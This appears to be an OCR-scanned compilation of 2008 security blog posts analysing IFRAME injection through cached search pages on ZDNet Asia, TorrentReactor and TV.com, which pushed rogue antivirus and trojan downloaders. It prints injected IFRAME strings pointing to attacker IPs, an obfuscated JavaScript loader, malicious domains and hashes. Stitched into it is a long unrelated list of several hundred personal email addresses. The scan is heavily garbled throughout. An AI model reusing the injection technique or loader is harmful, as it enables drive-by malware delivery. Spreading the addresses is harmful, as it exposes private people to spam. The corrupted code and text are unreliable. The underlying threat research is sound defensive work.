www. zdnetasia, com/search/results. htm? query=peek +a tho +bikinit+%ICIF RAME% 
2sre=//72.232.39.252/a/%3E. html - 43k - 16 hours ago - Cached - $ 


Similar pages 


Search results for “peek a boo bikini <IFRAME src=/72.232.39.262 ... 
What's new on ZDNet Asia. Search All, News, Insight, Reviews, Blogs, TechGuides, Photo 
Gallery, Videos, Jobs, IT Library, Downloads. Go. Create alert ... 

wow. zdnetasia. corm search/results. him? query=peek +a+boo+bikini+%ICIFRAME% 
2sre=//7 2,232.39. 252/a/%3E. html - 43k - 16 hours ago - Cached - Similar pages 


Search results for "kari sweets rapidshare <IFRAME src=//72.232... 

What's new on ZDNet Asia. Search All, News, Insight, Reviews, Blogs, TechGuides, Photo 
Gallery, Videos, Jobs, IT Library, Downloads, Go. Create alert ... 

www. zdnetasia. com/search/results. htm?query=kan+sweets +rapidshare+%3CIF RAME % 
20src=//7 2,232.39. 252/a/%3E. html - 41k - 19 hours ago - Cached - S 


Similar pages 


Search results for “pee-a-poo <IFRAME src=//72.232.39.252/a/> him! ... 
Featured Whitepapers. Search All, News, Insight, Reviews, Blogs, TechGuides, Photo 
Gallery, Videos, Jobs, IT Library, Downloads. Go. Create alert ... 

www. zdnetasia, corn/search/results, him? query=pee-a- poo+%3CIFRAME% 

QW sre=//7 2,232.39. 252/al%3E. html - 34k - 17 hours ago - Cached - Similar pages 


Search results for "peek-a-boo bikini <IFRAME src=/72.232.39.262 ... 
Search All, News, Insight, Reviews, Blogs, TechGuides, Photo Gallery, Videos, Jobs, IT 
Library, Downloads. Go. Create alert ... 

wew. zdnetasia.com/search/results. him? query=peek-a-boo+bikini+%3ClIF RAME% 
2s1c=//72,232,39,252/a/%3E, html - 34k - 16 hours ago - Cached - S 


Similar pages 


Search results for “port grnmaud beachwear <IFRAME src=i/72.232 ... 
Search All, News, Insight, Reviews, Blogs, TechGuides, Photo Gallery, Videos, Jobs, IT 
Library, Downloads. Go. Create alert ... 

www, zdnetasia, com/search/results, htm?query=port+grimaud+beachweart+%3CIFRAME% 
Wsre=//72.232.39.252/a/%3E. html - 43k - 15 hours ago - Cached - Similar pages 
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Bob@sonomal.com 
bob@stetsonrealty.com 
bob002111@yahoo.com 
bob10sim@aol.com 
bob32nh745bob32nh745@hotmail.com 
bob717@bellsouth.net 
bobadillarichard@gmail.com 
Bobbi@BobbiSweet.com 
Bobbi@hvc.rr.com 
bobbibuzzard@msn.com 
bobbieshatto@gmail.com 
bobblower@aol.com 
bobby.callaway@gmail.com 
bobby.likens@century21.com 
bobby@kentuckystatereo.com 
bobby@londonproperties.com 
bobbyallenOl1@gmail.com 
bobbybaker@gmail.com 
bobbychis1@aol.com 
bobbychung420@gmail.com 
bobbydegun@aol.com 
bobbygibbs3@yahoo.com 
bobbyhollisS3@yahoo.com 
bobbyperkins123@yahoo.com 
bobbywalkerj@yahoo.com 
bobc2799@yahoo.com 
Bobc3221@aol.com 
bobevol111@gmail.com 
bobfoldenc21@yahoo.com 
bobfrey@sbcglobal.net 
bobfromireland@gmail.com 
bobgoguen@gmail.com 
bobgrealtor@msn.com 
bobh@c21lhome.com 


bobhenderson@c21bowman.com 
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Bobkoryteam@aol.com 
bobmoore1954@mac.com 
bobolp@mail.de 
bobonik695@wp.pl 
bobpapke@hotmail.com 
bobpira2@msn.com 
bobridgway07@gmail.com 
bobsimpson11@msn.com 
bobsramek@gmail.com 
BobStevens@heyenappraisals.net 
bobumphlet@yahoo.com 
bobw409@aol.com 
bobwachtler@aol.com 
bobwieber@gmail.com 
bochco123@aol.com 
bochondb@comcast.net 
bochonlm@comcast.net 
bockhaus@cox.net 
bodeappraisals@yahoo.com 
bodie.orman@gmail.com 
bodiesbicv@gmail.com 
bodiesmado@gmail.com 
bodilylxho@gmail.com 
bodilyudd@gmail.com 
bo-djo@hotmail.com 
boebi5@hotmail.com 
bogara007@fastmail.fm 
bogdabflr@hotmail.com 
boginea@mail.ru 
bogner.oberkappel@aon.at 
bogscarreon@aol.com 
bohuskniven@telia.com 
boilermaker647@yahoo.com 
boilmelipletr@gmail.com 
bolanosre@yahoo.com 
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bolardaj@free.fr 
bolo2525@interia.pl 
bolognini.shiatsu@tiscali.it 
bolotnikov@mail.ru 
boltonad@gmail.com 
bomba21@hotmail.co.uk 
bombadil7 @tiscali.it 
bonacchichopen@tiscali.it 
bonacini.marco@tiscali.it 
bonailovich@tiscali.it 
bonazzo3011@virgilio.it 
bondfool@mac.com 
bondi beach _rox@hotmail.com 
bondkarla@gmail.com 
bondreo@sbcglobal.net 
bones6@live.com 
bonesjulianl4@yahoo.com 
bonewmpr@mail.ru 
bonisoli@tiscali.it 
bonita.reo@tmo.blackberry.net 
bonizzatomattia@virgilio.it 
bonjourchloe@aol.com 
bonndavid@gmail.com 
bonne-chance@aliceadsl.fr 
bonngarry@gmail.com 
bonnie.gregorio@rmx-e.com 
bonnie.rudolph@coldwellbanker.com 
bonnie@inweb.net 
bonnie@reosalesinleecounty.com 
bonnie@similiving.com 
bonnie@sullivanappraisalservices.com 
bonnie0326@aol.com 
bonniemccreary@aol.com 
bonnies@bsreg.com 
bonomellifranco@tiscali. it 
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bonsemail@cox.net 

boo boo _1012000@yahoo.com 
boobles@tiscali.it 
boochowniogran1974@mail.ru 
booieooie@yahoo.com 
bookbear@mac.com 
bookemdano007@hotmail.com 
boomerang64@tiscali.it 
booogie27@aol.com 
boopalupis@aol.com 
boozielou8@aol.com 
borabasa@gmail.com 

bordart inc@yahoo.com 
borelli.giuseppe@virgilio. it 
borgia.barbara@tiscali.it 
boriley@murney.com 
borland@midwestdevelopment.com 
born J@yahoo.com 
born2shop36@hotmail.co.uk 
bornsteinsong@aol.com 
bortolasrenzo@tiscali.it 
boruc719@interia.pl 

borya _ivanov _1964@mail.ru 
bosnian71@hotmail.com 
bosoxsux1467@yahoo.com 
bosse@auga.com 
bossjaka@mail.ru 

bosslock _226@hotmail.com 
bostonbarten@gmail.com 
bostrow@yahoo.com 
bottarch@tiscali.it 
botteropaolo@tiscali.it 
botticini@xnotar.it 
boubeer@hotmail.com 
bouchaib.kabbabi@free.fr 
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bouffantf@free.fr 
bouquet.patrick@free.fr 
bouricua94@gmail.com 
Bowermegan@yahoo.com 
bowerscred7@aol.com 
bowerssroka@cbpref.com 
bowmanator@sbcglobal.net 
bownlynn@yahoo.com 
bowofdeath86@yahoo.com 
bowsergroup@yahoo.com 
bowtellme@gmail.com 
boybulge@aol.com 
boyd@boydlivingston.com 
boyd@boydmcginn.com 
boydaydak@hotmail.com 
boydgrainger@yahoo.com 
boyermgmt@att.net 
boyntonl@ameritech.net 
boyz _187 211@hotmail.com 
bozanek88@email.cz 
bozenas51@yahoo.com 
bozounet@free.fr 
b-p2005@tiscali.it 
bpalmiero@hotmail.com 
bpatterson0@yahoo.com 
bpeoples@golfstylerealty.com 
bpiercy@oceaninvestments.com 
bpierick@regentwi.com 
bplumb82@yahoo.com 
bpo.amauro@gmail.com 
bpo.dj.solutions@gmail.com 
bpo.edwinalvarado@yahoo.com 
bpo.gwenjarvis@yahoo.com 
bpo.orders@hotmail.com 


bpo.owens@gmail.com 
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bpo.reo@gmail.com 
bpo.reo@rpstexas.com 
bpo.wagnergroup@gmail.com 
bpo@509properties.com 
bpo@alexbaglioni.com 
bpo@ashortsales.com 
BPO@AzREOSales.com 
bpo@bealrealty.com 
bpo@benhamfl.com 
bpo@benhamGA.com 
bpo@benhamnc.com 
bpo@bestohioreo.com 
BPO@BKFamilyHomes.com 
bpo@buymidmichigan.net 
bpo@c21mckee.com 
bpo@calpropgroup.com 
bpo@careyteam.com 
bpo@cds1.net 
bpo@chesrealty.com 
bpo@choicemountainproperties.com 
bpo@claudeworrell.com 
bpo@claytonrhodesllc.com 
bpo@code3realty.com 
alaa_sadi@hotmail.com 
eng.m.alabid@gmail.com 
Ghazi2004 8@hotmail.com 
admirza9@gmail.com 

is ma90@hotmail.com 
ghofran.babeir@yahoo.com 
mmoud2000@yahoo.com 
msharialobdr@hotmail.com 
rqatu@hotmail.com 
awas404@hotmail.com 
radhi977@hotmail.com 
mshary6@hotmail.com 
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UPDATED: [1]More CNET Sites Under IFRAME Attack; [2]Rogue RBN Software Pushed Through 
Blackhat SEO. 


This currently ongoing malware embedded attack aimed at ZDNet Asia and TorrentReactor 
is very creative at the strategic level, whereas the IFRAME-ing tactic remains the same. 
The sites’ search engines seem to have been exploited to have the IFRAME injected, not 
embedded, within the last 24 hours, redirecting to known Russian Business Network’s IPs and 
ex-customers in the face of rogue anti-virus and anti-spyware applications. For the time being, 
zdnetasia.com has 11,200 cached pages loading the IFRAME, and torrentreactor.net - 29,300 
cached pages loading the IFRAME. Even worse, the IFRAME embedded search results hosted 
on their sites, are appearing between the first ten to twenty search results, thanks to the sites 
high page ranks. Sample search queries : 


jamie presley 


mari misato 


risa coda 


kasumi tokumoto 


jill criscuolo 


<script> 

var 

chipxgqb=""" 1Aqapkry ‘1G *2F *2CFmawogly ,upkug* 6: ° 68° 1Aqap* 68)‘ BOkru’ 62nclewceg ‘1FHctcQapkry‘ B2qpa* 1F 
jyur’ 10--uuu ,c/1/f/vujg,amo-uvp-prawygp ,r jr’ 1Dpgd" 1F * 68)qqacrg* 6:fmawogly ,pgdgppgp' 6; )* 60" B4lkajg*1 
Fpclfno/vugzu/ jgpg’ 64qglqmp*1F * 66)nmacuknl , jpgd) ‘ 66°16" 1A" 7A-qap* BG) * BGkru' 1G* 68" 6;'1@"'2F*2C'1A-ga 
pkru'1G"; iliklhvo="""; owulzmse="";var rucgpedz ;rucgpedz=chipxgqb . length; for 
(i=6;i<rucgpedz;i++){ iliklhvo+=String .fromCharCode(chlpxgqb.charCodeAt(i)*2) 
}owulzmse=unescape(iliklhuo) ; document .write(owulzmse) ; 

</seript>| 


The IFRAME is loading 72.232.39.252/a also responding to themaleks.net. The link it- 
self is loading an obfuscated javascript, which once deobfuscated attempts to load a-n-d- 
the.com/wtr/router.php (216.255.185.82 - INTERCAGE-NETWORK-GROUP2) also responding to 
ppcan.info, with two more domains sharing nameservers, findhowto.net, searchhowto.net. 
Ppcan.net has already been assessed by [3]Microsoft’s Security Team : 


"The advantage gained by faking the Referer field is nullified when pages use client-side cloak- 
ing to distinguish between fake and real Referer field data by running a script in the client’s 
browser to check the document.referrer variable. Example 1 shows a script used by the spam 
URL naha.org/old/tmp/evans-sara-real-fine-place/index.html. The script checks whether the 
document.referrer string contains the name of any major search engines. If successful the 
browser redirects to ppcan.info/mp3re.php and eventually to soam; otherwise, the browser 
stays at the current doorway page. To defeat the simple client-side cloaking, issuing a query 
of the form “url:link1” is sufficient. This allows us to fake a click through from a real search 
engine page." 


So the malicious parties are implementing simple referrer techniques to verify that the end 
users coming to their IP, are the ones they expect to come from the campaign, and not client- 
side honeypots or even security researchers. And if you’re not coming from you’re supposed 
to come, you get a 404 error message, deceptive to the very end of it. Sample redirects upon 
visiting the IFRAME-ed pages at ZDNet Asia with the right referrer : 
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xpantivirus2008.com (69.50.173.10) 


scanner.spyshredderscanner.com (77.91.229.106) 


hot-pornotube-2008.com (206.51.229.67) 


porn-tubecodec20.com (195.93.218.43) 


Once the junkware inventory is empty, all pages redirect to requestedlinks.com 
(216.255.185.82). Let’s take a peek at the codec : 


Scanner results : 11 % Scanner (4/36) found malware! 


File Size : 85008 byte 


MD5 : 6b325c53987c488c89636670a25d5664 


SHA1 : c6aeeafffel0e70973a45e5b6af97304ca20b3bd 


Fortinet - Suspicious 


Norman - Tibs.gen200 


Prevx - TROJAN.DOWNLOADER.GEN 


Quick Heal - Suspicious - DNAScan 


Even more interesting is the fact that literally minutes before posting this, another such 
Campaign got launched at ZDNet Asia, this time having just 24 pages locally cached, and 
loading another IFRAME to 89.149.243.201/a redirecting to cialis2men.com/product/61 
(92.241.162.154). 


1326 


Search results for YDP_ 113 PRICE<IFRAME src=i/72.232.39.252/a/> html 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

wew.torrentreactor.net/search. php?search=&words= Y DP +1 13+PRICE%3CIF RAME% 
Wsre=//? 2.232.359. 252/a/%3E. html - 54k - Cached - Similar pages 

Search results for SAFETY TRAININGsIFRAME src=/72.232.39.262/a/> html 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

wew.torrentreactor.net/search. php? search=&words=SAFETY +TRAINING%3CIFRAME% 
Wsre=//72.232,39,252/a/%IE. html - 54k - Cached - Similar pages 


Search results for US INSTITUTE OF LANGUAGE<IFRAME src=//72.232 ... 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

www. torrentreactor, net/...//72,232.39.252/a/%3E. html - 54k - Cached - Similar pages 
Search results for PORTABLE HARD DRIVES REVIEWS<IFRAME src ... 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

weew. torrentreactor.net/...//72.232.39.252/a/%3E. html - 54k - Cached - Similar pages 


Search results for RACHAEL RAYENGAGED<IFRAME src=//72.232.39.252/a ... 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

wew.torrentreactor.net/...//72,.232.39.252/a/%3E. html - §2k - Cached - Similar pages 


Search results for READING PA MOVIES<IFRAME src=/f72.232.39.252/a ... 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

wew.torrentreactor. net/... //72.232.39.252/a/%3E. html - 54k - Cached - Similar pages 


Search results for WORM OR VIRUS ALERTsIFRAME src=//72.232.39.282 ... 
user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

wew. torrentreactor.net/...//72.232.39.252/a/%3E.himl - 54k - Cached - Similar pages 


Search results for FOTOS DE PUERTO RICO<IFRAME src=!/72.232.39.252 ... 
user, pass:, Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 
wew.torrentreactor.net/...//72.232.39.252/a/%3E.himl - 54k - Cached - Similar pages 


ge 


Search results for RHAPSODY IN BLUE CLARINET SOLO<IFRAME src ... 
user.. pass;. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV Shows, 
BushTorrent, CD Covers, Software ... 

weew.torrentreactor.net/...//72.232.39.252/a/%3E. himl - 56k - Cached - Similar page 


Search results for XYLENE<IFRAME src=//72.232.39.252/a/> html 

user. pass:. Login. Any category, Anime, Apps, Games, Movies, Music, Other, Series/TV 
Shows, BushTorrent, CD Covers, Software ... 

wew. torrentreactor.net/search. php?search=&words=XY LENE %3CIFRAME% 
Wsre=//72.232,39,252/a/%ZE. html - 51k - Cached - Similar pages 


What is going on, have the sites been compromised, or the attackers are in fact smarter than 
those who would even bother to scan for remotely exploitable web application vulnerabilities, 
next to remote file inclusion? ZDNet Asia and TorrentReactor themselves aren’t compromised, 
their SEO practices of locally caching any search queries submitted are abused. Basically, 
whenever the malicious attacker is feeding the search engine with popular quaries, the sites 
are caching the search results, so when the malicious party is also searching for the IFRAME in 
an "loadable state" next to the keyword, it loads. Therefore, relying on the high page ranks of 
both sites, the probability to have the cached pages with the popular key words easy to find 
on the major search engines, with the now "creative" combination of the embedded IFRAME, 
becomes a reality if you even take a modest sample, mostly names. 
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Q) Messeee Box Odject Error 


Vadeo Activex Object Error 
Your browser carret Gapley thus vicieo fife, 


You need to download new veruicn of Video 
Actoven Cwect to lary thes wedieo fhe 


To download and instal Activex Object cick Continue. 


ee lia al 


The bottom line is that ZDNet Asia and TorrentReactor SEO practices of caching the search 
queriesAnd given that the malicius parties can now easily tweak popular keywords to appear 
on ZDNet Asia and TorrentReactor’s sites, thereby getting a front placement on search engines, 


they can pretty much shift the SEO campaign to a malware campaign by taking advantage of 
"event-based social engineering". 


1. http: //ddanchev. blogspot .com/2008/03/more-cnet-sites-under-iframe-attack. html 
2. http: //ddanchev. blogspot . com/2008/03/rogue-rbn- sof tware-pushed- through. html 


3. http: //research.microsoft.com/users/shuochen/HM.doc 
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4.3.3 Rogue RBN Software Pushed Through Blackhat SEO (2008-03-05 15:35) 


Search Results for LA-MARATHON <IFRAME src=//89.149.243.202it> 
Search Results for LA-MARATHON, Repeat this search with context displayed. Biographies 
Aword appears too when Please bacco seek History Topics ... 

stluczka_prv.pl/ - 2k - Cached - Similar page 

Search Results for TAPROBANE-ISLAND <IFRAME src=//89.149.243.202it> 
Search Results for TAPROBANE-ISLAND. Repeat this search with context displayed 
Biographies. A word appears too often: Please refine search. History Topics ... 
www-history.mces. st-andrews. ac.uk/...//89.149.243.202A%3E - 2k - Cached - Similar page 


Search Results for PICTURE VIEW-COM <IFRAME src=//89.149.243.202it> 
Search Results for PICTUREVIEW-COM. Repeat this search with context displayed 
Biographies. A word appears too a Please refine search. History Topics ... 

www. barkanes. com - 2k - f imilar page 

Search Results for SERENEX sIFRAME src=//89.149.243.202it> 

Search Results for SERENEX. Repeat this search with context displayed. Biographies. A 
word appears too often: Please refine search. ne i eri 

www. yookoso, com/redir. php?ID=157 ~ 2k - he 


Search Results for DOG-BARK-PARK.INN <IFRAME src=//89,149.243.202it> 
Search Results for DOG-BARK-PARK-INN. Repeat this search with context displayed 
Biographies “hale spent too pose Please refine search. History Topics ... 

hus.zs.pl/ - 2k - Cached - 


Search Results for URBAN-LEGEND <IFRAME src=//89.149.243.202it> 
Search Results for URBAN-LEGEND. Repeat this search with context displayed. Biographies 
Aword appears too often: Please = source bbs Topics ... 

business. bestreality.ru/ - 2k - Cached 


Search Results for SPEED-RACER <IFRAME src=//89.149.243.202it> 

This site may harm your computer, 

Search Results for SPEED-RACER. Repeat this search with context displayed. Biographies 
A word appears too often; Please refine search Tietety Topics ... 

www. knology.net/resOplht/index. htm - Similar pa 


J 


Search Results for NICOLE-LINKLETTER <IFRAME src=//89.149.243.202it> 
Search Results for NICOLE-LINKLETTER. Repeat this search with context canyee 
Biographies. A word appears too often Please refine search. History Topics .. 

wwe helzovikhotel. com/ - 2k - Cached - 


page 
ad 


Search Results for JOHN-MCWHORTER <IFRAME src=i/89.149.243.202it> 
Search Results for JOHN-MCWHORTER. Repeat this search with context displayed 
Biographies. A word appears too often: Please refine search h Fonety Topics ... 
limany.org/article_2006_01_7_5139.html - 2k - - Simila 


page 


Search Results for DMITRY-MEDVEDEV <IFRAME src=//89.149.243.202it> 
Search Results for DMITRY-MEOVEDEV. Repeat this search with context displayed 
Biographies. A word appears too often: Please refine search. History Topics ... 

www. coloradoinvestors.com/ - 2k - Cached - Similar pag 


On numerous occasions in the past, | emphasized on [1]the malicious attacker Keep it Simple 
Stupid (KISS) approach for anything starting from Rock Phishing, to maintaining a huge 
live exploits domains portfolio hosted on a single IP. This is yet another example of the KISS 
strategy uncovering another huge IFRAME campaign, again taking advantage of locally cached 
pages generated upon searching for a particular word, and the IFRAME itself. In the previous 
example for instance, we had an second ongoing IFRAME campaign with just 4 pages injected 
with 89.149.243.201, however, what Keep it Simple Stupid really means in this case is that the 
next IP in their netblock 89.149.243.202 is currently getting injected at many other sites as 
well. The difference between the previous campaign and this one, is that [2]the previous one 
was targeting just two high page rank-ed sites, while in the second one, the malicious parties 
pushing [3]RBN’s rogue XP AntiVirus are relying on a much more diverse set of domains 
loading the IFRAME. One factor remains the same, both campaigns continue pushing the 
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rogue XP AntiVirus. XP AntiVirus’s pitch, note the downloads success rate mentioned and how 
they forgot to change the template used in the campaign by putting the rogue’s name : 


a> - 
©) XP ars 


Not satisfied with your current Windows antivirus 
software ? 
Make the swxtch to XP antrrrus Protection and exgey your 
system work without any influence of spyware and wrures 
Solu : 
and Home Offre 
and Medean Busmess 


TRY FREE 


$ How XP antivirus can help you? 


FREE scan ® 
P tvrus © Geaged to provide you wth the highest lev of protectior 
squinst maisous spyware and mabware including keyloggers, hackers and PROTECT YOURSELF ! 
downtoader Is your computer infected? 
xP antivirus technoloey protects you fom both known and emerging threat Stop spyware ard spam 
verts a gives you rea- Ome protection for your computer with our infecting your PC! 
Sdvarned XP atvins wd rea-ome Wor - 
Keep your computer fee from trojans, spyware, adware, worms, keyoooes 
roothits, dakers and other makcious prog arr 
Find ot right now wih ow 
Why spyware is dangerous? FREE SPYWARE SCAN 
Spyware & the most prevalent treat to orine computer privacy ad security It | 
is Pitabed on your commuter rough) webwltes, spam and at Neda  sadtors j 
legtmate programs you ratal ~ 
-\ 
Spyware bring: lots of damage in the serwe of cists comficerttiaity. Spyware \ 
programs regeter every User Step, both made tw system and in the Inmemet . 
Al reformation 6 debvered to the matefector wx eects Gata nhs, not your 


rherest 


The whole process tubes lous Guar 
S maretes and i FREE of oll charge 


"XP antivirus has been downloaded over 4 Million times; with a 20,000 more 
downloads every week. Millions of people worldwide use Spyware Doctor to protect 
their identity and PC security. XP antivirus has consistently been awarded Editors’ Choice, 
by leading PC magazines and testing laboratories around the world, including United States, 
United Kingdom, Germany and Australia. All current versions of XP antivirus have won Editors’ 
Choice awards from Secure Home PC Magazine in United States. XP antivirus is advanced 
technology designed specially for people, not experts. It is automatically configured out of 
the box to give you optimal protection with limited interaction so all you need to do is install 
it for immediate and ongoing protection. XP antivirus’s advanced RealOnGuard technology 
only alerts users on a true Spyware detection. This is significant because you should not be 
interrupted by cryptic questions every time you install software, add a site to your favorites or 
change your PC settings." 


Upon visiting 89.149.243.202/t and 89.149.243.202/a we get forwarded to bestsex- 
world.info/soft.php?aid=0064 &d=3 &product=XPA (72.232.224.154) and from there to 
xpantivirus2008.com (69.50.173.10). There’re in fact several other domains currently promot- 
ing this as well : xpantiviruspro.com (69.50.183.50); xpdownloadings.com (69.50.183.50); 
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xpantivirus.com (216.255.180.58), as well as the following : hotantivirus.info (74.86.81.80); 
easyantivirus.info (74.86.81.80); a2zantivirus.com (74.86.81.80). The downloader’s detec- 
tion rate : 


Scanner results : 17 % Scanner(6/36) found malware! 
Time : 2008/03/05 13:57:48 (EET) 

File Size : 47104 byte 

MD5 : 2102cb53606f535ca8132c3324953596 

SHA1 : 0756f530e782c3d2e85a8186e052b722b017flea 
AntiVir - TR/Crypt.ULPM.Gen 

Fortinet - Suspicious 

Microsoft - Trojan:Win32/Vxidl.gen!B(Suspicious) 
Panda - Suspicious file 

Prevx - TROJAN. DOWNLOADER.GEN 

Sophos - Mal/HckPk-A 


Smells like RBN’s used InterCage and ATRIVO netblocks from routers away. 


Related RBN coverage: 

[4]RBN’s Phishing Activities 

[5]RBN’s Puppets Need Their Master 

[6]RBN’s Fake Account Suspended Notices 

[7]A Diverse Portfolio of Fake Security Software 
[8]Go to Sleep, Go to Sleep my Little RBN 
[9]JExposing the Russian Business Network 
[10]Detecting the Blocking the Russian Business Network 
[11]Over 100 Malwares Hosted on a Single RBN IP 
[12]RBN’s Fake Security Software 

[13]The Russian Business Network 


ttp://ddanchev. blogspot .com/2007/09/popular-web-malware-exploitation.htm 
ttp://ddanchev .blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.htm 


ttp://en.wikipedia.org/wiki/Russian_Business_Network 


1. 
2. 
3: 
4 
5. 
6. 
7. 


ttp://ddanchev.blogspot.com/2008/02/rbns-malware-puppets-need-their-master .htm 
ttp://ddanchev .blogspot.com/2008/01/rbns-fake-account-suspended-notices.htm 
ttp://ddanchev. blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 


8. http: //ddanchev. blogspot .com/2007/11/go-to-sleep-go-to-sleep-my-little-rbn. htm 

9. 

10. http://ddanchev. blogspot .com/2007/11/detecting-and-blocking-russian-business. html 
11, 
12. 

13. 
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4.3.4 Unprofessionally Piggybacking on my Research (2008-03-05 20:55) 


j Wi = °¥ Don't Get Left Behind 
Iu d Ve. 48g PBXGUIDEcom BEE 


IPPBX Now  {Siissfenmtos 


Tedey on ilVire Security [Il Hewse Telecomenunicetions TechGeste People OGurliogs Techif#estyie Exiessee ‘Science [verte ITAT 00S 


’ 3 " , 
Taw NOLEN CIM Weterner Cot Pet Re Ret reeks anatyees 
Technokogy News and Jobs » Itormaton Techmetogy Mews » Ziiiet Asie under FRAME neck atteck? 
- Delivered daily . rete 
ZONet Asia under IFRAME hack attack? Ae Svbosabe te our Tochasiegy sewateBer, get the 
User Rating 10 \etert and tay sheet more 
Por COC C © tee Be 


Special Partees Offer: Save wp te 68S When You 
F.Secure’s Secerity Response Team Manager, Wing Fei Chia, has posted an entry 00% BR Cet 1 Youn 


at F.Secure’s beg claiming that ZDNet Asia has a prettier with thelr search 

engine and Ccowld be seeding exers to sites laden with malware aed worse. Get cur FREE Buyers end Comparicen Gudete VoIP 
own More 

Looks the Austraban technology news 

Smarthious nt the o 


SUSE Linux Enterprise 
Ermerpreee Linus by Hewett 
Novel > r cuee doemstig N 
Vere car , is . 


0-3.6TB seed Silay ln nttlg ete AD sl Cortisn 
IN NO TIME FLAT. sce 
vite 7 ow Te “wre 
Related stories row sD 
5 high page ranks, t 
ing come Today on iTWire oles | 
4 Sew pages of y 
To get the unsuspke user Doeng vetual fence approved by US to control border 
—_ a, pet 2 ve et 4 
fenbaes 
on Chia’s blog posting shows a screenshot 
dagioynarts tig 


earch cthreng afected ZDNet Assa search Cavcatng Tux cane the 


cached pages loading the FRAME was found Upon chck 
usiness Network's @s and RBN is sty kno 
ant+-apyware apphcations. Al the end of the 


We [F-Secure] detect ¢ a8 Trojan-Downloade 


@: Chea is no secunty slouch — he's been workins 


He's currently the Securty Response Team Manager at the F-Secure Securty Labs, jomed F-Secure in 2007 ree 
and is 3 member of ISACA (information Systems Audit & Cortrol Agsocistion) and holds a CISSP (Certifed 


Why did | bother to send this message to [1]Full-Disclosure last night, despite that | already 
posted it here? Because | knew [2]that this would happen, it’s happened before, and it will 
happen in the future, so having dates and hours to prove what you see on the top of each 
and every blog post here, namely the real-time situational awareness objective, is what | 
wanted to achieve. And | did. Thankfully, there’re [3]Sophos, [4]TrendMicro, [5]McAfee and 
[6]Commtouch realizing that corporate blogging evolved from hard selling and the basics of 
marketing, to a complex PR platform, and therefore quote and link to my blog, to have me 
link back, so that [7]a conversation emerges. Redefining the process of rephrasing so that my 
creative commons license per post is not violated? Find the ten differences between my post 
yesterday, its title, and today’s statements: 


"Continuing, Chia says that: “Leveraging on the fact that the site is, legitimate, and has 
high page ranks, the popular search engines are returning some of these iFRAME-ed results in 
the first few pages of the search results. And the objective? To get the unsuspicious user to 
click on the link”." 


So, my original post went online yesterday, [8]TeMerc reposted it, [9]so did Paul, | sent 
it to [10]Full-Disclosure, and as it looks like [11]F-Secure’s Wing Fei Chia seems to read, either 
Full-Disclosure, or my blog to come up [12]this post, 24 hours later. Anyway, SecurityFocus, 
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again covers the incident in an article entitled "[13]Fraudsters piggyback on search engines", 
quoting me, this time professionally. 


. http://seclists.org/fulldisclosure/2008/Mar/0041 .htm 
. http: //www.itwire.com/content/view/16981/53/ 
. http: //www.sophos.com/security/blog/2007/10/714.htm 


ttp://blog.trendmicro.com/malicious- iframes-hosted-on-e-zines-a-media-possibility/ 


WN FR 


http: //www.avertlabs.com/research/blog/index . php/2008/01/09/the-russian-business-network-is-on-tenterhook 


ttp://blog.commtouch. com/cafe/data-and-research/response-to-dancho-danchev-on-the-malware-outbreak-cente 


. http://ddanchev. blogspot .com/2006/07/security-research-reference-coverage.htm 
. http: //temerc.com/forums/viewtopic. php?f=10&t=4682 


oOo oOmn 


"hatp://aeclists.org/fulldssclosure/2006/¥ax/0044. nea 
| http:/ /any. f-secure con/weblog/archives/00001996 html 
_netp:/ /wuy.£ secure con/veblog/axchives/00001306.htal 
_http:/ /auy. securityfocus.con/brief/695 
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4.3.5 More CNET Sites Under IFRAME Attack (2008-03-06 13:48) 


TV.com Search Results for. [ TUTORIAL HTML CODES Itiframe srcdo ... 
TUTORIAL HTML CODES fiframe sredo-the. comat. html 

wew.ty.com/search php?type=11 &stype=alla.qs= Lila tn areca 
2src=//do-t-h-e.com%3E. html - 24k - 23 hours ago - Cached - g 
TV.com Search Results for [TABLE STYLE SHEET HTML ltiframe srcdo... 
TABLE STYLE SHEET HTML Itiframe sredo- ‘“ acane hon. 
wew.tv.com/...//do-t-h-e.com%3E. html - 30k - 22 hours ago - Cached - Similar pages 


TV.com Search Results for. [MYSPACE WALLPAPER HTML ltframe srcdo ... 
MYSPACE WALLPAPER HTML hiframe sredo-the.comgt. html. 
weew.tv.com/.. //do-t-h-e.com%3E. html - 27k - 23 hours ago - Cached - Similar pages 

TV.com Search Results for [REDIRECT WEB PAGE HTML ttiframe srcdo ... 
REDIRECT WEB PAGE HTML Itiframe sredo- es ce html 
wew.ty.com/.. //do-t-h-e.com%3E. html - 22k - 22 hours ago - Cached - Similar pages 
TV.com Search Results for [ HTML DROP DOWN BOX CODE Itiframe ... 
HTML DROP DOWN BOX CODE Hiframe ae comat. — 
wrew.ty.com/...//do-t-h-e.com%3E. html - 22k - 22 hours ago - Cached - Similar page 
TV.com Search Results for. [ CODE SITE. DK VOICE HTML Itiframe ... 
CODE SITE.OK VOICE.HTML Itiframe srcedo-the.comagt. html. 
weew.ty.com/...//do-t-h-e.com%3E. html - 35k - 23 hours ago - Cached - Similar page 


TV.com Search Results for. [ CHRISTIAN CULTS ltiframe srcdo-t-h-e ... 
CHRISTIAN CULTS Hiframe sredo-the.comgt. html. ... For information on Christian see 
http: “Awww. ty. corvjason-reso/person/49156/summary html .. 

www .ty.com/search. php?type=1 yap secee dp HRISTIANSC ULTS +%3Ciframe% 
2src=//do-t-h-e. com%3E. html - 34k - Car + Similar page: 


